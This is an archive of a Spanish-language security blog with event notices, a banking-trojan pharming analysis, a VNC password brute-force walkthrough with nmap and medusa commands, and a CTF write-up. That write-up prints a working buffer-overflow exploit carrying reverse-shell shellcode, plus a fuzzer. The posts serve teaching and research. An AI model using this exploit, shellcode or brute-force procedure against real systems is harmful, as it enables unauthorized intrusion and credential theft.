Open-Sec -Seguridad y Contraseguridad Informática

LimaHack 2011 - Call For Papers

2011-09-14T11:38:00.000-05:00

Extraido de: http://limahack.com/index.aspx?pagina=cfp.aspx

Te parece gracioso como quieren parar el "hacktivismo" de Anonymous ampliando los anchos de banda ? Te resulta divertido explicarle a los demas como piratasdelared saco informacion de algunos sitios ? Ahora tu fingerprint (footprint para otros) incluye los sitios pastebin ? Blogueas continuamente explicando tecnicas de explotacion de vulnerabilidades ? Eres un pentester profesional ? No mandas mails a las listas de correo pidiendo ayuda para que funcione tu hack tool sino que la hackeas para que funcione "as expected" ? Aprendiste a desarrollar exploits y ahora quieres gritarselo al mundo (bueno, por ahora al menos a todo Perú) ? Investigaste sobre como funciona Stuxnet y quieres compartir todo ese conocimiento ? Eres bueno explicando a los "nuevos" y gerentes los temas de hacking ? Eres mujer y hackeas como Joanna Rutkowska ? Dominas algun framework de hacking al 100% ?

Si respondiste SI, entonces eres la cantidadata (las mujeres primero) o el candidato ideal para exponer en LimaHack 2011 y el motivo principal es querer compartir el conocimiento con los demas.

Todos esos motivos son un ejemplo de lo que esperamos sean las exposiciones durante esta edicion de LimaHack 2011 que considera charlas por diferentes niveles de conocimiento :
- Introductorio
- Medio / Tutorial
- Avanzado

Tambien hemos considerado diferentes tipos de exposiciones :
- Networking. Orientado a hacking de dispositivos de red.
- Desarrollo. Orientado a hacking de aplicaciones en general.
- Administracion de Sistemas. Lo mas clasico del hacking.
- Consultoria. Para consultores que ven tema de seguridad, ejemplo : el tecnico que instala los IPSs.

Es importante que tengas en cuenta que LimaHack es acerca de hacking de seguridad y temas relacionados (analisis de incidentes, computacion forense). LimaHack no es acerca de como establecer un SGSI ni como auditar con respecto a COBIT ni los 10 mejores tips para configurar un firewall.

LimaHack es un evento que durara un dia completo y que tendra charlas en paralelo, asi que hay muchas oportunidades de presentar tus investigaciones y compartir lo que sabes.

El Comite organizador evaluara los "papers" que envies, te confirmara tu participacion y en base a esto se publicara la agenda.

Por ser un evento 100% gratuito, no habra cobertura de gastos de viaje de ningun tipo.

Es importante que estes 100% seguro del compromiso que asumiras y que se requerira que prepares una presentacion y que el contenido sera revisado previamente asi como la ejecucion de la exposicion.
No esperamos demos en vivo y reales de como meterse a la base de datos de una organizacion, por ejemplo, porque entonces seria nuestro ultimo LimaHack, solo cuentas como hiciste y si estas mintiendo, el detector de mentiras te pasara una descarga de 50,000 voltios para que recapacites ;)

IMPORTANTE : LimaHack es el evento MAS tecnico de seguridad en Perú, no se aceptaran papers que propongan promocion de productos, servicios, marcas, etc.

De que hablamos : LimaHack 2011 Call For Papers
Cuando : El CfP se cerrara el 29 de setiembre
Como : Completar el formato del paper de acuerdo al ejemplo colocado en <paper_ejemplo.txt> y enviarlo en formato de texto plano y simple a cfp@limahack.com
(El nombre del archivo debe tener el formato : nombre-apellido-titulo_paper.txt)

OWASP Latam Tour 2011 en Lima

2011-08-11T12:58:00.001-05:00

Les copio la invitación del capítulo local de OWASP.

Estimados,

El presente correo es para invitarlos al OWASP LATAM TOUR 2011, el cual esta organizado en conjunto por el Capitulo Peruano de OWASP y OWASP Foundation, el ingreso es libre para miembros de OWASP y estudiantes Universitarios (Pre-Grado) quienes deberán acreditar su ingreso con el Carnet Universitario vigente.

Si deseas ser miembro el proceso de registro se detalla líneas abajo.

INFORMACIÓN RELACIONADA AL EVENTO

Día : Sábado, 13 de Agosto del 2011
Hora: 9 am - Acreditación
10 am a 4 pm - Conferencias
Dirección: Av. Salaverry 2625 – San Isidro (Frente al Hotel Meliá)
Auditorio – Pabellón “A”, 4to piso (Capacidad de 150 personas)

Sitio Web: https://www.owasp.org/index.php?title=LatamTour2011#tab=Lima.2C_Peru

Registro: http://www.regonline.com/trainingdayperu

PONENTES:

- Fabio Cerullo

Especialista en Seguridad en AIB Bank (Irlanda) - Miembro del Comité Global de Educación OWASP

- Ing. Ricardo Supo

Chief Security Office en Consultoría LimaSoft SAC - Líder Capítulo Peruano OWASP

- Ing. Juan Pablo Quiñe

CSO en Hewlett-Packard Perú

- Ing. Andrés Morales

Consultor Senior Seguridad Informática en Ximark

- Bach. Mauricio Velazco

Consultor de Seguridad en OpenSEC

- John Vargas

Consultor de Seguridad en ETEK INTERNACIONAL - Fundador y Líder Capítulo Peruano OWASP

- Rolando Antón

Coordinador de Servicios – Consultor de Seguridad en ETEK INTERNACIONAL

PROGRAMA DEL EVENTO

Presentación y palabras de Bienvenida
John Vargas

OWASP Top 10
Fabio Cerullo

Google Hacking
John Vargas

Presentación de SQLinJeymei
Ricardo Supo

OWASP Testing Guide
Mauricio Velazco

Usando técnicas Man in the Middle para la Seguridad Web
Juan Pablo Quiñe

2011 CWE/SANS - Top 25 Monster Mitigations & OWASP TOP10 2010
Andres Morales

OWASP WebGoat Project
Rolando Antón

Adicionalmente incluyo algo más de información acerca de OWASP

¿Cómo ser miembro?

Para hacerse de la membresia de OWASP deberán ingresar al siguiente Link:

http://www.regonline.com/Register/Checkin.aspx?EventID=919827

Seleccionar el tipo de Membresia ( Individual Member ) durante el proceso de pago podemos ingresar el Cupon de Descuento LATAM y se aplicara un descuento del 60% . (El costo normal es de 50 dolares).

Al ser miembro de OWASP algunos de los beneficios son :

Participacion de manera gratuita a todos los eventos organizados por OWASP Perú.
Posibilidad de adquirir CPE's
Pertener a OWASP Linked'In Grupo
La lista de beneficios adicionales los podemos ver en
https://www.owasp.org/index.php/Member_Offers
https://www.owasp.org/index.php/Membership

Troyanos Bancarios en Peru II

2011-04-08T21:04:00.000-05:00

Hola.

Antes de leer esto, asegurate de leer la primera parte de este post aqui .

En la primera parte mostre la manera como el malware era descargado a la victima haciéndose pasar por una postal de amor. Ahora veremos el funcionamiento del malware una vez ejecutado por la victima. El escenario : la victima recibe el correo, confia en el titulo, descarga el archivo Postal.exe y lo ejecuta.

Antes de empezar, es importante recalcar que si reciben un archivo sospechoso NO LO EJECUTEN, apliquemos la politica del implicit deny. Todo lo que parece extraño, lo desechamos y solo leeremos y abriremos correos de contactos conocidos. Ademas tengan en cuenta tener siempre un antivirus actualizado. Por otro lado, si lo que quieren hacer es jugar con el malware para ver lo que hace, utilicen una maquina virtual para probarlo. Aunque algunos tipos de malware reconocen si estan corriendo sobre una maquina virtual y no ejecutan su payload, pero eso para otro dia.

Ok, una vez ejecutado el malware lo primero que notamos es trafico de red inusual. Utilizamos un analizador de paquetes como Wireshark para ver mas alla de lo evidente.

En los paquetes 1y2 se observa una resolución DNS de un dominio .com. Al revisar el host, vemos que es de una empresa de latinoamerica cuyo servidor probablemente ha sido vulnerado como parte de la campaña. En 3,4 y 5 vemos el establecimiento de una sesión TCP el famoso SYN - SYN-ACK - ACK hacia el puerto 80 del server mencionado. A partir del paquete numero 6 vemos lo mas interesante, un requerimiento HTTP con el metodo GET hacia un recurso localizado en /images/bg.jpg

Al ver el contenido de esta supuesta imagen las primeras lineas nos develan la naturaleza del ataque.

Al final del archivo, vemos lo mas interesante.

En su totalidad, este es el famoso archivo hosts. Para los que no saben que es, una breve descripcion. Como sabemos, los equipos en internet utilizan su dirección IP para comunicarse entre ellos. Dado que seria imposible para un ser humano acordarse de los numeros IP de todos los dominios que visita, se invento el protocolo DNS para resolver una direccion IP a un nombre de dominio. Claro, es mas facil para un usuario acordarse de www.google.com que de 74.125.226.115.

Sin embargo, el sistema operativo, antes de mandar una consulta al servidor DNS, lo primero que hace es revisar el archivos hosts. Este es un simple fichero localizado en el sistema de archivos del equipo (en Windows: C:\Windows\System32\drivers\etc\hosts En linux: /etc/hosts ) que contiene entradas con la estructura Direccion IP : Dominio. En resumen, cuando escribes en tu navegador www.google.com lo que hace el sistema operativo primero es buscar en el archivo hosts si existe alguna entrada para ese dominio (www.google.com). De existir, toma la direccion IP del archivo e intenta conectarse al mismo. Es decir, ya no hace la consulta DNS y confia en el archivos hosts.

Este ataque es conocido como Pharming. Lo que hace el malware primero es descargar un archivo hosts modificado maliciosamente y sobreescribe el archivo original del equipo por el descargado, de manera que cuando el usuario intente conectarse a cualquiera de esos dominios (todos de ellos bancos peruanos) en realidad se estara conectando a la IP del atacante quien configura un servidor Web en el equipo para que a la victima se le presenta una Web idéntica a la de su banco y de esta forma podra obtener las credenciales para luego hacer transacciones fraudulentas.

Como vemos, una única direccion IP es utilizada para todos los dominios. Al analizar el registro de esa dirección IP en la base de datos Whois de ARIN podemos observar que le pertenece a la empresa Turnkey Internet Inc localizada en Norteamerica. Esta empresa brinda servicios de hosting y servidores dedicados. Luego de realizar un DNS reverso y un escaneo de puertos, concluimos que el atacante adquirió un VPS (Virtual Private Server) de la compañia que tiene un costo que varia entre 39 y 129 dolares al mes. Ya saben lo que dicen, para ganar dinero hay que gastarlo. Habrá comprado el atacante este servicio son su propia tarjeta de crédito o con una robada ? De ser lo primero entonces Turnkey Internet Inc tiene la identidad real de nuestro atacante en su base de datos...

Viendo el escaneo de puertos vemos una tipica instalacion por defecto de un VPS, con un CPanel y Plesk para su facil administracion. SMTP, POP3, POP3S, IMAP, IMAPS, DNS, muchos servicios innecesarios lo que nos muestra que el atacante no hizo un hardening de su servidor y que nos puede dar una luz respecto a su perfil. Lo mismo si ingresamos al servidor Web sin suplirle una cabecera HOST, vemos algunos archivos por defecto de una instalación de apache.

Jugando un poco con las aplicaciones Web falsas me asombra el nivel de detalle que el atacante le ha añadido (todo en php). Incluso implementa la tarjeta de coordenadas utilizadas por muchos bancos para que las victimas no sospechen. Probando algunas cosas, logro forzar un error PHP en el servidor lo que nos brinda un Full Path Disclosure y podemos averiguar el usuario con el que el atacante maneja su servidor: PEPITOCO. Al googlear este nick, vemos varios resultados pero no encontramos nada relevante.

Lamentablemente cuando quise darle mas tiempo para analizar esta campaña, el servidor del atacante habia sido dado de baja por el proveedor.

Con esto terminamos. Hemos visto a grandes rasgos el funcionamiento de un troyano bancario desde su propagación hasta su ejecución. Algo importante es que este malware apunta exclusivamente a bancos peruanos. Alrededor de 3 meses despues de iniciada la campaña el servidor del atacante fue dado de baja. En ese tiempo, cuántas victimas habrán ingresado sus credenciales en esos portales falsos ?

No lo olviden, desechar todo correo extraño. No está demas revisar si su archivo hosts no tiene algo extraño. Lo pueden encontrar en :
C:\Windows\System32\drivers\etc\hosts

Saludos.
MVelazco
http://twitter.com/mvelazco

Lo que CORTAS no siempre se CORTA

2011-04-06T10:41:00.004-05:00

Escrito por Rodolfo Castelo.

Empezaré por contarles que hoy mi amigo Walter, ante un hecho personal me consulto sobre un tema de Microsoft Office (como soy según él mosquetero de Microsoft), en donde una imagen previamente “cortada” es mostrada en toda su plenitud original, en otras palabras la imagen sin cortar. Entendemor por "cortar" a la trata de la imagen para que sólo sea visible parte de ella.

En vista de ello, se me ocurrió una teoría no muy zafada, y creo algo lógico, claro está en el escenario usado, pero que tenía que probarse.
Bueno, la teoría era la siguiente:

“Microsoft Office, en su herramienta Word no es una suite ni aplicación de dibujo, pero que tiene algunos componentes que nos ayudan en el día a día para colocar imágenes en nuestros documentos y así hacerlos más atractivos y entendibles, por tanto, al cortar una imagen, este lo que hace es dejar visible la parte que nos interesa y ocultar con parámetros, meta o tags el resto de la imagen original, por tanto otra herramienta similar a Word, no necesariamente interpreta esta información de manera correcta o simplemente no lo hace, hecho por el cual deja visible toda la imagen, es ahí donde llegamos a decir LO QUE CORTAS NO SIEMPRE SE CORTA”

Hice un printscreen y lo pegue en Word 2010
Luego se usó la utilidad recortar y se dejo visible sólo parte de la imagen.
Grabé el documento y se lo envíe a mi amigo Walter quien lo abrió con OpenOffice
¿Qué creen? En el documento, Walter ve la imagen original sin cortes y no sólo lo que se dejo visible.

Por tanto la teoría era cierta, el Microsoft Word, al recortar directamente en la aplicación una imagen, no lo hace en realidad solo deja visible lo que deseas, pero en realidad guarda la imagen original y completa. El Open Office desecha los parámetros de ocultación y muestra la totalidad de la imagen.

Este tema podría catalogarse como un punto a considerar dentro de los análisis de seguridad de información ya que afecta directamente a la Confidencialidad del remitente siempre y cuando se manipule imágenes en el mismo Microsoft Word y no en aplicaciones de terceros enfocadas al dibujo.

A continuación muestro las imágenes vista desde Microsoft Word y desde Open Office.

Imagen como se ve en MS Word, la que fue recortada en la misma aplicación.

Como se ve en OpenOffice

Comparto esta información para los fines pertinentes!

Usen herramientas de dibujo cuando deseen manipular imágenes y pegarlas en documentos si es que no quieren que alguien vea más alla de lo evidente.

Troyanos Bancarios en Peru I : Operacion Bambi ?

2011-02-05T21:10:00.006-05:00

Hola.

Hace unos dias recibi un correo electronico, como ustedes tambien seguramente suelen recibir, con la tipica postal de amor adjuntada a un mensaje cursi sobre un diseño visiblemente falso. Normalmente desecho estos correos pero ahora que dispongo de algo de tiempo me propuse hacerle un simple analisis para descubrir algo sobre su funcionamiento, sus creadores o lo que sea que pueda averiguar. Debo admitir que es algo que quiero hacer hace tiempo. El area de analisis de malware es realmente bastante interesante y puede llegar a ser muy compleja al jugar con debuggers y el binario. Sin embargo, dada mi calidad de newbie en este tema, este analisis sera algo mas superficial. Para hacerlo mas interesante, separare este post en partes.

Ok, veamos el correo.

Al ver el codigo del correo puedo visualizar que todo esta armado alrededor de una imagen hosteada en http://i55.tinypic.com/yyyy.jpg. Una imagen jpg, tal vez le pueda sacar algo de metadata con la siempre funcional Foca. Luego de ir al servicio online de la herramienta obtengo el siguiente resultado:

Interesante, segun la Foca la imagen fue creada con Photoshop. Ahora para ser delincuente hay que saber de todo, hasta de diseño ! Otro dato interesante es la ultima fecha de modificación: el 26 de Octubre del 2010 a las 21:05 horas lo que nos brinda información sobre cuando empezó la campaña. Seguimos.

El link que descarga la "postal" apunta a http://xxx.com/Gusanito/Amor/Postal-Amor. Si ingresamos con el navegador, al instante vemos un pop up preguntando si deseas descargar el binario "Postal.exe". Hacer esto con un navegador no nos brinda la informacion que realmente queremos ver.

Utilizaremos netcat para ver mas alla de lo evidente y ver la respuesta del servidor Web cuando hagamos el requerimiento a este recurso a traves de HTTP.

El servidor responde con el codigo HTTP 302 que es una redireccion. En la cabecera Location: podemos ver el nuevo destino: http://yyy.com/mjimenez/config.php . El malware no esta hosteado en www.xxx.com, tan solo es utilizado como un puente para llegar a él. Me pregunto porque el atacante lo ideo de esta manera, tal vez intenta implementar algo de seguridad para protegerse ? . Luego de las cabeceras HTTP se puede ver un Warning en un script php que ademas nos brinda una ruta del servidor (Path Disclosure). Por un momento pense que estaba viendo un error originado en un servidor del atacante e incluso que ya habia descubierto su nombre.

La emocion duro poco. Luego de analizar la respuesta concluyo que el atacante ademas de forzar una redireccion desde http://xxx.com/Gusanito/Amor/Postal-Amor llama a un script hosteado tambien en el servidor comprometido : www.xxx.com/contador.php (que contiene un error al utilizar la funcion preg_match() y por eso el warning ). Infiriendo por el nombre, asumo que es usado para determinar cuantas personas ya han bajado su malware y llevar algo de estadistica de esta campaña de ataque.

Vamos por el siguiente recurso http://yyy.com/mjimenez/config.php

Ok, el servidor responde con la cabecera Content-Disposition. Esta cabecera no me es familiar, estoy mas acostumbado a ver tan sólo Content-type en las respuestas. Luego de preguntarle a san Google descubro que cuando la cabecera Content-Disposition tiene como valor attachment, se fuerza al navegador a descargarse un fichero del servidor web, en este caso, el binario Postal.exe que espera ser ejecutado para infectar al usuario.

Al enviar el requerimiento por HTTP y ver el dump del binario en texto encuentro cosas interesantes (ver siguiente imagen). Primero observo una ruta de una instalación de Microsoft Visual Studio lo que nos da una luz sobre cómo fue creado este binario. Pero lo que mas llama mi atencion es lo que parece ser la ruta del directorio donde el atacante estaba programando el malware. Viendo la extension del archivo casa.vbp confirmamos el uso de Visual Studio ademas podemos afirmar que se trata de un projecto de Visual Basic. Lo intrigante es el porque del nombre de directorio "bambi". Será que el creador tiene una fascinación con el pequeño ciervo de cola blanca o es simplemente un nombre aleatorio? . De cualquier forma, este ataque ahora sera conocido como La Operacion Bambi.

Hasta este punto tenemos conocimiento de 2 servidores vulnerados como parte de esta campaña que pertenecen a empresas que brindan servicios hosting. El primero www.xxx.com hostea el recurso Gusanito/Amor/Postal-Amor que al momento de ser requerido hace una redirección hacia el recurso /mjimenez/config.php del segundo servidor http://yyy.com donde finalmente se fuerza al navegador a descargar el fichero Postal.exe.

Luego de descargar el binario, aprovecho la genial herramienta online Virustotal para hacerle un análisis. Según sus resultados tan sólo 5 antivirus de 43 (11.6%) reconocen a Postal.exe como un malware variante de Kanzi. Pueden ver el reporte de Virustotal aqui.

Eso es todo por ahora, atentos a la proxima parte.

Saludos

MVelazco.
http://twitter.com/mvelazco

Auditoria de passwords : Brute Forcing VNC

2011-01-28T20:24:00.009-05:00

Hola.

Queria empezar el primer articulo de este año compartiendo con ustedes un escenario real en los servicios que realizamos. Hace unas semanas me encontraba en la ultima (y mas interesante) etapa de un proyecto de Ethical Hacking: la explotacion o comprobacion de vulnerabilidades.

Los resultados fueron los esperados: control de varios equipos sensibles tanto externa como internamente, nuevo conocimiento adquirido en el ambito tecnico asi como en la gestion de un proyecto y ademas una carpeta llena de archivos de evidencia esperando ser plasmados en la siguiente etapa : la elaboracion de entregables que tanto le gusta a los consultores de Open-Sec.

Nota: Toda informacion relevante presentada (rangos ip, passwords, numero de hosts, capturas, etc, etc) ha sido modificada para guardar la confidencialidad respectiva.

Revisando los resultados de Nmap veo que muchas de las estaciones de trabajo cuentan con el puerto 5900 abierto. Como saben, este es uno de los puertos por defecto que utiliza el protocolo RFB. RFB es utilizado por las distinas implementaciones del sistema VNC (Virtual Network Computing) que permiten la administracion grafica y remota de un equipo. Pero, estaciones de trabajo con VNC ? Esto es algo que ya he visto en otras organizaciones, es una solucion normalmente utilizada para que el personal de soporte pueda gestionar los problemas de los usuarios remotamente.

Los que han utilizado VNC antes sabran que en instalaciones por defecto lo unico que se configura en el servidor para la autenticacion es un password. En el caso de RealVNC, por ejemplo, es necesario obtener una versión de pago para contar con la funcionalidad de autenticacion nativa. TightVNC, no cuenta con esa funcionalidad mientras que en UltraVNC si es posible asociar la autenticación nativa o incluso al dominio (pero por defecto es solo un password).

Teniendo en cuenta que estoy enfrentado a una red corporativa con mas de 500 nodos será posible que cada una de las instalaciones VNC tenga un password distinto ? O los administradores eligieron un único password para el control de todos, o la mayoria, de los equipos ?

Vamos a comprobar esta hipotesis. Primero utilizamos el siempre util nmap para determinar el subconjunto de equipos que cuentan con el servicio VNC activo en uno de los segmentos de red.

 nmap -p 5900 -oG vnc_servers 10.0.0.0/24

Nmap nos permite crear 3 tipos de reportes. Utilizo el parametro -oG para crear el reporte, como nmap le llama, "grepeable" que puede ser tratado de manera eficiente con el comando grep que es lo que haremos. De esta forma, sera mas facil crear una lista de equipos.

Ahora jugamos un poco con grep y cut.

 cat vnc_servers | grep open | cut -d" " -f2

Lista de servidores VNC creada. Lo siguiente es crear un diccionario customizado para la organizacion, pueden utilizar una herramienta como rsmangler que permite crear un diccionario recibiendo algunos parametros que utiliza como semilla para el resultado.

La herramienta a utilizar para la auditoria de passwords en este caso sera medusa que tiene un modulo para la autenticacion VNC. Otra opcion es hydra que tambien soporta conexiones hacia VNC. Ahora a correr medusa y esperar los resultados :

 medusa -H vnc_hosts -u "" -P dict.txt -M vnc -r 5 -T 1 -t 1

Si enviamos el output a un archivo y luego "grepeamos" veremos el resultado final.

Interesante resultado. Para comprobarlo, pueden utilizar cualquier cliente VNC, en mi caso xtightvncviewer

Eso fue todo, espero que haya sido de interes para alguien. Seria interesante ver comentarios, quejas, consultas, divagaciones.

Happy Hacking,

Mauricio Velazco
http://twitter.com/mvelazco

OSEH @ HONDURAS

2010-12-10T00:19:00.002-05:00

Excelentes personas, mucho buen nivel y una ciudad super agradable como lo es San Pedro de Sula.

Una excelente organización en manos de la Ing. Tania Pineda y el Dr. Daniel Bueso (lo pongo en segundo lugar no sólo por aquello de las damas primero sino porque es el esposo y ya sabemos que ellas son primero).
Ellos dirigen la Escuela Internacional de Negocios de Honduras.

Durante 3 días del mes de Noviembre tuvimos mucho aprendizaje de técnicas de hacking y al final conseguimos 6 nuevos OSEH.

Definitivamente, los retos son la mejor forma de medir el avance de los participantes a lo largo del entrenamiento.

Las imágenes a continuación muestran unos momentos de estos retos donde el equipo AspidaIgnis ganó el primer lugar. Felicitaciones!

Tenemos planes de volver en el 2011 y otros países más en Centro América con entrenamientos de hacking y forensia computacional (OSFA).

Proximo post : LimaHack 2010...el cierre de año que tenia que ser.

OSEH en Ecuador

2010-11-05T16:40:00.003-05:00

Hola.

El tercer fin de semana del mes de Octubre (15,16,17) del presente estuvimos en la calurosa ciudad de Guayaquil para dictar el curso Open-Sec Ethical Hacker como parte del programa de estudio de la Maestria de Seguridad Informática Aplicada dictada en la ESPOL (Escuela Superior Politécnica del Litoral).

Luego de 3 intensivos dias de hacking, retos y buena comida concluimos el curso con una gran aceptación y despertar de interés por parte de los estudiantes de la maestria. Fruto del curso, 32 nuevas personas (y futuros masters en seguridad informática) cuentan con la certificación Open-Sec Ethical Hacker.

Desde aqui un saludo a los nuevos amigos que hicimos en Guayaquil. Espero poder retornar pronto para hacer otra parrillada :P.

Les dejo algunas imágenes.

Preparando los 52352352 USB's con una imagen de backtrack.

Concentración!

¿Cuál era el comando ?

Capture the Flag !!

MSIA

Para los interesados en este curso pueden encontrar más información en http://www.open-sec.com/oseh/oseh.html o escribiendo a info@open-sec.com.

Próximo destino del curso OSEH ?
Honduras !!!

Les cuento en otro post.

Saludos

Mauricio

Ekoparty 2010

2010-10-02T22:18:00.002-05:00

Importado de : http://wcuestas.blogspot.com/2010/10/ekoparty-2010.html

Esta fue una de las aventuras más simpáticas de los últimos tiempos. Ya el año pasado nos quedamos sin ir por la carga laboral y este año nos lanzamos.
Era importante para nosotros ir como team y para ver que tal estamos comparados con un medio tan avanzado y competitivo como el argentino, en otras palabras, que tan "hackers" somos y de hecho, el resultado fue positivo para nosotros, pero, hay que tener en cuenta que en Argentina no solamente hay buenos pen testers, ethical hackers, etc. sino excelentes investigadores y desarrolladores en seguridad informática. Mauricio Velazco se preguntaba : y ellos estan todo el día investigando para encontrar esas vulnerabilidades y desarrollar exploits ? La respuesta es SI porque allá hay empresas que se dedican a desarrollar herramientas de hacking, tanto como software libre como comercial. Ejemplo de todo ello son Core Impact (de Core Security), CANVAS (de Immunity) y la incorporación de w3af al "conglomerado" de Rapid7 que ya cuenta con MetaSploit, así como, Netifera y el ataque de Padding Oracle aplicado a la __viewstate de .Net donde el 50% del mérito lo tiene un argentino, Juliano Rizzo.
Aca nuestra investigación se da en forma posterior porque nos dedicamos a entender las vulnerabilidades reportadas y luego, a comprender como funcionan las herramientas o exploits lanzados, y, en algunos casos, para corregirlos o adecuarlos a nuestras necesidades (aunque ya tenemos 3 nuevas herramientas que lanzaremos este mes en el evento de ISACA el 22 de octubre).
A continuación la aventura Ekoparty en imágenes :
Perú estuve super presente en Ekoparty 2010.
Estuvimos 4 de Open-Sec, Juan Pablo, Felipe y Miguel (más datos omitidos a propósito).

La danza diabólica de las habitaciones compartidas.
Quién duerme con MV ? Por aca! Pero, luego encontró su pareja ideal : MU, durmieron juntos 3 noches y fueron felices por siempre. MV se quedó unos días más en Bs Aires haciendo los trámites del matrimonio.
(El del gesto diabólico no es ninguno de los M*).

Nos mandaron un mail diciendo que lleguemos a las 7:30 am., como buenos peruanos puntuales, llegamos a las 9:00 de la madrugada y quedó claro que argentinos y peruanos somos hermanos, más puntuales imposible!

El escenario de Ekoparty. El lugar donde se realiza es bien particular, hay que tener la mente bien abierta para encontrarle lo simpático, pero, el escenario como tal es buenísimo : un logo de Ekoparty en neón, un panel suficientemente grande, buen audio, una decoración entretenida, muy bueno.

A la izquierda : MV en el CtF. Lo curioso fue que alguien dijo : es un web! MV buscó, lo encontró y empezó a atacarlo. Rato después alguien le dice que era un web que estaba publicado en Internet y los retos eran de esos que solo entienden los creadores y sus amigos. Curiosamente, el web del reto terminó siendo "alterado". Quién habrá sido ?
A la derecha : MU, CC y JQ haciendo lockpicking que luego será aplicado en pruebas de seguridad física.
A la izquierda : seleccionando "exploits".

A la derecha : MU meditando sobre el padding oracle attack...oooommmm...ZZZZZZ

Dicen que la mejor defensa es el ataque, MV lo pone en práctica...

A la izquiera : peruanos en el subte.

A la derecha : reciclador tecnológico.

Ekoparty 2010

2010-09-14T20:33:00.001-05:00

Mañana el equipo de Open-Sec estará viajando a Buenos Aires para la 6ta edición de la conferencia Ekoparty.

Estaremos posteando noticias y fotos por este medio.

Que la sigan rooteando !!!

Resolución 1er Reto How Strong Is Your Fu 2

2010-08-29T23:37:00.014-05:00

Hola.

El 19 de Junio pasado tuvo lugar el segundo "How strong if your Fu", torneo de hacking organizado por los chicos de Offensive Security. Tuve la oportunidad de participar (haciendo team con Hackspy) y fue una experiencia bastante interesante. A diferencia de otros torneos, los de Offsec siempre son un tanto reales. (TRY HARDER !!)

En este post describiré la solución del primer reto (Vuln). Primero delineo brevemente el escenario utilizando el lenguaje telegráfico:

- VPN, 5 equipos
- Puertos descubiertos en el primer equipo : 22, 80, 7500
- Servidor Web lista un directorio con 2 archivos: vuln.c y vuln
- Viendo el source, vuln abre el puerto 7500.
- Funcion handle_reply() es vulnerable a buffer overflow.
- A explotar !!!

Todos los ficheros utilizados en este post pueden ser descargados aqui.

Dado que tenemos el fuente se hace fácil reconocer la cantidad de caracteres que permitirán el desbordamiento, sin embargo y para no perder la costumbre, escribimos un pequenho fuzzer.

Listo, al fuzzear vemos que alrededor de 280 bytes crean el desborde con su respectivo Segmentation Fault. Utilizando gdb para el debug, confirmamos que el registro EIP ha sido sobreescrito con el valor hexadecimal de "A" (41).

Al analizar ESP vemos que también estamos en control de este registro.

Ahora es necesario descubrir exactamente cuáles son los 4 bytes que sobreescriben el EIP para poder tomar control del flujo del proceso. En este caso utilizaremos a metasploit, en específico, las herramientas pattern_create y pattern_offset. Pattern_create crea una cadena con caracteres no repetidos y de un tamanho a eleccion, en nuestro caso, 280. Utilizamos esa cadena para enviarla al soft vulnerable y una vez sobreescrito el EIP utilizamos la herramienta pattern_offset para descubrir exactamente cuáles son los bytes que escribieron sobre EIP. Veámoslo en imágenes:

EIP fue sobreescrito con 0x6a413969 y utilizamos estos caracteres como entrada de pattern_offset:

Oka, ahora sabemos que a partir del byte 268 estamos sobreescribiendo el EIP. Otro problema: con que dirección sobreescribimos el registro EIP ? Sabemos que podemos controlar a ESP así que podemos poner la shellcode ahi y de alguna forma sobreescribir EIP para que "salte" a ESP (JMP ESP). Afortunadamente este ejecutable nos hace la vida más fácil dado que ya tiene una función jmp() que hace exactamente eso!

 int jmp(void){  
 __asm__("jmp %esp");  
 return 0;

Lo que tenemos que hacer ahora es encontrar la dirección de memoria con el buen gdb.

Tenemos la dirección de la intrucción JMP ESP (0x08048703). Ya podemos empezar a crear el exploit y el buffer que enviaremos se verá algo asi:

   buffer= "A"*268 +  
   "\x03\x87\x04\x08" #JMP ESP  
   + shellcode       #Payload a elegir

Por último, debemos elegir el payload. Metasploit nos ayuda una vez más con la herramienta msfpayload que permite generar shellcodes con distinto payload: conseguir shell, shell reversa, meterpreter reverso, etc, etc, etc. En este caso yo elegiré una shell reversa hacia el puerto 4444 :

Ahora todo listo, escribimos el exploit correspondiente y antes de ejecutarlo abrimos el puerto 4444 con netcat.

Voila!

Happy Hacking

Mvelazco

 ################################  
 #coded by mvelazco  
 #http://ehopen-sec.blogspot.com/  
 #mvelazco at open-sec.com  
 ################################  
 import socket  
 import struct  
 s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
 print "\nSending buffer..."  
 s.connect(('127.0.0.1',7500))  
 # Reverse shell port 4444 by metasploit  
 shellcode=("\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"  
 "\x5b\x5e\x68\xc0\xa8\x28\x69\x66\x68\x11\x5c\x66\x53\x6a\x10"  
 "\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f"  
 "\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"  
 "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"  
 )  
 buffer="A"*268  
 ret= "\x03\x87\x04\x08"  
 buffer+=ret + "\x90"*0 + shellcode  
 s.send(str(buffer) + '\r\n')  
 s.close()  
 print "EXPLOITATION DONE"  
 print "HAVE A NICE DAY :P"

 #coded by mvelazco  
 #http://ehopen-sec.blogspot.com/  
 #mvelazco at open-sec.com  
 import socket  
 import time  
 buffer='\x41'*40  
 while len(buffer)<10000:  
   s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
   try:  
     s.connect(('127.0.0.1',7500))  
     print "fuzzing with "+ str(len(buffer)) + " bytes"  
     s.send(buffer + '\r\n')  
     buffer+='\x41'*50  
     s.close()  
   except:  
     print "Crashed!!"  
     break

Seguridad en aplicaciones web bajo OWASP @ ISACA

2010-08-23T11:31:00.001-05:00

Gracias a Wikipedia:

OWASP (Open Web Application Security Project) es un proyecto de código abierto dedicado a determinar y combatir las causas que hacen que el software sea inseguro. La comunidad OWASP está formada por empresas, organizaciones educativas y particulares de todo mundo. Juntos constituyen una comunidad de seguridad informática que trabaja para crear artículos, metodologías, documentación, herramientas y tecnologías que se liberan y pueden ser usadas gratuitamente por cualquiera.

Ya desde principios de este año, el capítulo peruano de OWASP se estuvo organizando y tuvimos las primeras reuniones. Este martes 24 de Agosto se tendrá la primera presentación de OWASP Perú en la reunión mensual de ISACA. Les dejo los detalles, nos vemos ahi:

Saludos,
MVelazco.

Objetivos:

Conocer el marco normativo para el desarrollo e implementación de aplicaciones web seguras.
Mostrar algunas técnicas para el diseño, desarrollo e implementación de aplicaciones web seguras.

Expositores de OWASP Lima:

John Vargas Pérez, Consultor de Seguridad Informática, Visiontech del Perú.
